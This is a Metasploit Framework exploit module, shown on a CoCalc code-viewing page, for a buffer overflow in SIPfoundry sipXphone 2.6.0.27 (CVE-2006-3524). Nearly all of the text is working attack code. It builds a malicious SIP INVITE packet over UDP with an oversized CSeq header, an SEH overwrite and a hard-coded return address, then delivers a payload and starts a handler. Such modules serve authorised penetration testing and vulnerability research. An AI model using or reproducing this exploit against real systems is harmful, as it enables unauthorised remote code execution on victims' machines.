Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/sip/sipxphone_cseq.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Udp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
17
'Description' => %q{
18
This module exploits a buffer overflow in SIPfoundry's
19
sipXphone 2.6.0.27. By sending an overly long CSeq value,
20
a remote attacker could overflow a buffer and execute
21
arbitrary code on the system with the privileges of
22
the affected application.
23
},
24
'Author' => 'MC',
25
'References' => [
26
[ 'CVE', '2006-3524' ],
27
[ 'OSVDB', '27122' ],
28
[ 'BID', '18906' ],
29
],
30
'DefaultOptions' => {
31
'EXITFUNC' => 'process',
32
},
33
'Payload' => {
34
'Space' => 400,
35
'BadChars' => "\x00\x0a\x20\x09\x0d",
36
'StackAdjustment' => -3500,
37
},
38
'Platform' => 'win',
39
'Targets' => [
40
[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],
41
],
42
'Privileged' => false,
43
'DisclosureDate' => '2006-07-10',
44
'DefaultTarget' => 0,
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
53
register_options(
54
[
55
Opt::RPORT(5060)
56
]
57
)
58
end
59
60
def exploit
61
connect_udp
62
63
user = rand_text_english(2, payload_badchars)
64
port = rand(65535).to_s
65
filler = rand_text_english(212, payload_badchars)
66
seh = generate_seh_payload(target.ret)
67
filler[204, seh.length] = seh
68
69
sploit = "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
70
sploit << "To: <sip:#{rhost}:#{rport}>" + "\r\n"
71
sploit << "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
72
sploit << "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
73
sploit << "Call-ID: #{(rand(100) + 100)}#{rhost}" + "\r\n"
74
sploit << "CSeq: " + filler + "\r\n"
75
sploit << "Max-Forwards: 20" + "\r\n"
76
sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"
77
78
print_status("Trying target #{target.name}...")
79
80
udp_sock.put(sploit)
81
82
handler
83
disconnect_udp
84
end
85
end
86
87